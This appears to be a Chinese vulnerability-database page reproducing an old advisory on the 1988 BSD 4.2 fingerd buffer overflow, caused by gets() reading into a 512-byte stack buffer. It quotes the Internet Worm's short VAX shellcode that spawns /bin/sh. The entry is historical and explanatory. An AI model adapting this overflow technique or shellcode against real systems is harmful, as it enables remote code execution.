2021年4月8日22:33:24BSD 4.2 - 'fingerd' Remote Buffer Overflow已关闭评论26 views字数 1008阅读3分21秒阅读模式
BSD 4.2 - 'fingerd' Remote Buffer Overflow
漏洞ID | 1053339 | 漏洞类型 | |
发布时间 | 1988-10-01 | 更新时间 | 1988-10-01 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/2/info
fingerd is a remote user information server that implements
the protocol defined in RFC742. There exists a buffer
overflow in finderd that allows a remote attacker to execute
any local binaries.
finderd reads input from its socket using the gets()
standard C library call passing it a 512-byte automatic
buffer allocated in main(). gets() reads the input and
stores it into the buffer without performing any bounds
checking. This results in a standard stack buffer
overflow when main() return.
The Internet Worm used a string of 536 bytes to
overflow the input buffer of fingerd on the VAX. The
VAX machine code it used was:
pushl $68732f 'sh '
pushl $6e69622f '/bin'
movl sp, r10
pushl $0
pushl $0
pushl r10
pushl $3
movl sp, ap
chmk $3b
This code executed execve("/bin/sh", 0, 0).
UDP数据包恶意选项设置漏洞 漏洞ID 1207616 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0217 CNNVD-ID CNNVD-199701-002 漏洞平台 N/A CVSS评分 …
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论